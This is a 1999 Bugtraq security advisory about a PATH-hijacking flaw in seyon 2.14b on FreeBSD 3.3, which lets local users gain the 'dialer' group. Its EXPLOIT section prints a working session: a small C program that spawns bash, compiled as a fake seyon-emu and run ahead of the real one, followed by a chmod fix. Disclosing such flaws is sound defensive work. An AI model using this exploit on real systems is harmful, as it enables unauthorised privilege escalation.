Bugtraq mailing list archives
FreeBSD 3.3's seyon vulnerability
From: btellier () USA NET (Brock Tellier)
Date: Mon, 8 Nov 1999 20:50:38 MST
Greetings,

In preparing for this advisory release, I checked for "seyon" vulnerabilities in the bugtraq archives. I found that the exploit I had developed had already been discussed in May 1997. However, this does not change the fact that the current version of FreeBSD still ships a vulnerable version with vulnerable privs. I believe this is still worth noting. Here is my advisory as it was to be published before the previous vulnerability came to light.

OVERVIEW

A vulnerability exists in seyon v2.14b which will allow any user to upgrade his or her privs to those with which seyon runs.

BACKGROUND

This advisory is based entirely off the work I've done on FreeBSD 3.3-RELEASE and seyon 2.14b which is included on the FreeBSD installation CD as an "additional package". When installed via sysinstall, seyon's permissions are sgid "dialer". Different versions of seyon and different packages of 2.14b may have different default permissions.

DETAILS

Upon startup, seyon executes the programs "seyon-emu" and "xterm". The paths to these programs are not absolute and are gotten from the user's $PATH. By adding a directory we have write access to in our $PATH and putting our own version of seyon-emu or xterm, we can make seyon run this program with egid dialer.

EXPLOIT

bash-2.03$ uname -a; id; ls -la `which seyon`
FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999 jkh () highwing cdrom com:/usr/src/sys/compile/GENERIC i386
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
-rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon
bash-2.03$ cat > seyonx.c
void main () {
    setregid(getegid(), getegid());
    system("/usr/local/bin/bash");
}
bash-2.03$ gcc -o seyon-emu seyonx.c
bash-2.03$ PATH=.:$PATH
bash-2.03$ seyon
bash-2.03$ id
uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec)
bash-2.03$

FIX

Simply chmod 750 `which seyon` and add selected users to the "dialer" group.
Brock Tellier
UNIX Administrator
Chicago, IL, USA
btellier () usa net